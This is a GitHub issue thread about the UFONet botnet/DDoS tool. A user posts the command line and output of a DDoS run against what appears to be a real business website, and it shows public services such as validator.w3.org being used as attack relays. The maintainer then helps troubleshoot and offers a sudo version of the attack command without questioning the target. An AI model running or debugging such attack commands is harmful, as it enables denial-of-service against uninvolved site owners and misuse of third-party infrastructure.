### ISSUE TITLE
What did i Do wrong?

### ISSUE THREAD

**Issue by sinaj2889** [epsylon/ufonet#351]
~/ufonet $ ./ufonet -a https://www.modellbau-werkstatt.at/ --no-purge -r 5
CRITICAL: Can't open /proc/net/dev !
CRITICAL: Can't open /proc/net/route !
CRITICAL: Can't open /proc/net/dev !
                     ____                                                        
          ||        / /\ \      ||              #===============================================#
        -(00)-     + (XX) +   -(00)-            ||                                             ||
   ||     ||   O ==*~~~~~~*== 0 ||        ||    ||  > Botnet [DDoS]   #  > Close Combat [DoS]  ||
 -(00)-          (0)  XX  (0)           -(00)-  ||                                             ||
   ||             \| (00) |/              ||    ||     |-> ZOMBIES    #     |-> LOIC           ||
        (O)_  (O)  0'----'0  (O)  _(O)          ||     |-> DROIDS     #     |-> LORIS          ||
            |  |.''.( xx ).''.|  |              ||     |-> ALIENS     #     |-> UFOSYN         ||
            .'.'   X|'..'|X   '.'.              ||     |-> UCAVs      #     |-> XMAS           ||
     .-.  .' /'--.__|_00_|__.--'\ '.  .-.       ||     |-> X-RPCs     #     |-> NUKE           ||
    (O).)-|0|  \   x| ## |x   /  |0|-(.(O)      ||     |-> DBSTRESS   #     |-> UFOACK         ||
     `-'  '-'-._'-./ -00- \.-'_.-'-'  `-'       ||     |-> SPRAY      #     |-> UFORST         ||
        _ | ||  '-.___||___.-'  || | _          ||     |-> SMURF      #     |-> DROPER         ||
     .' _ | ||==O |   __   | O==|| | _ '.       ||     |-> TACHYON    #     |-> OVERLAP        ||
    / .' ''.|  || | /_00_\ | ||  |.'' '. \      ||     |-> MONLIST    #     |-> PINGER         ||
    | '###  |  =| | ###### | |=  |' ###  |      ||     |-> FRAGGLE    #     |-> U
==========================================                                       Starting round: 1  of  5
==========================================                                       [Info] [Zombies] Attacking from: validator.w3.org
[Info] [Aliens] Attacking from: gtmetrix.com                                     [Info] [Droids] Attacking from: jigsaw.w3.org
[Info] [X-RPCs] Attacking from: sifat.org                                        [Info] [UCAVs] website-down.com -> Target is ONLINE! -> [Keep shooting!]
                                                                                 ---------
                                                                                 [Info] [AI] Scanning target to check for levels on defensive shields...
                                                                                  -Total tests: 1

   -Bytes in (this round) : 15.82 KB
   -Load time (this round): 1.16 seconds

[Error] [AI] Something wrong attacking!

**Comment by epsylon** [comment]
Hello @sinaj2889,

Remember that it is best to use this template to make the reports easier to understand and to be able to see the whole process (and the environment in which it is launched): 

https://github.com/epsylon/ufonet/blob/master/docs/.github/ISSUE_TEMPLATE/bug_report.md

It seems that you have a problem in the environment configuration, which prevents you from accessing the processes:
```

CRITICAL: Can't open /proc/net/dev !
CRITICAL: Can't open /proc/net/route !
CRITICAL: Can't open /proc/net/dev !
```

Do you have the kernel compiled with GRSec?

Perhaps the **fastest but most insecure solution is** to launch the application using "sudo":

`sudo python3 ufonet -a https://your-target.com --no-purge -r 5 `
